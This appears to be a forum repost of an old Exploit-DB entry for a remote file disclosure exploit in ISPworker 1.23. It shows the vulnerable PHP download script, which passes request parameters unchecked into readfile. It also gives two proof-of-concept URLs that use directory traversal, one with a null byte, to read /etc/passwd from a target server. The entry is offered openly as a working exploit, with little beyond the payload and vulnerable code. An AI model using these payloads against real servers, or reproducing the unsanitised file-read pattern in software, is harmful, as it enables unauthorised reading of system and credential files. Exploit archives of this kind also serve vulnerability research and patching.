- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 10262
- Проверка EDB
-
- Пройдено
- Автор
- CR4WL3R
- Тип уязвимости
- WEBAPPS
- Платформа
- LINUX
- CVE
- N/A
- Дата публикации
- 2009-12-01
Код:
[ Discovered by cr4wl3r \ cr4wl3r[4t]linuxmail[dot]org ]
########################################################################
#ISPworker <= 1.23 Remote File Disclosure exploit
#Download Script : http://www.ispware.de/_files/ispworker-1.23.tar.gz
#Dork : die("lamers attempt"); :P
########################################################################
#
#Vuln : ./ispworker-1.23/files/ispworker/module/ticket/download.php
#
# <?header('Content-type: '.$_REQUEST[type]);
# header('Content-Disposition: attachment; filename="'.$_REQUEST[filename].'"');
# readfile("./tmp/$ticketid"."_".$_REQUEST[filename]);
# ?>
#
#PoC : http://[target]/[path]/module/ticket/download.php?ticketid=../../../../../../../../../etc/passwd%00
# http://[target]/[path]/module/ticket/download.php?filename=../../../../../../../../../etc/passwd
#
########################################################################
########################################################################
####################[90r0nt4l0 und3r9r0nd c0mmun1ty]####################
########################################################################
########################################################################
[ Gorontalo / 2009 ]- Источник
- www.exploit-db.com
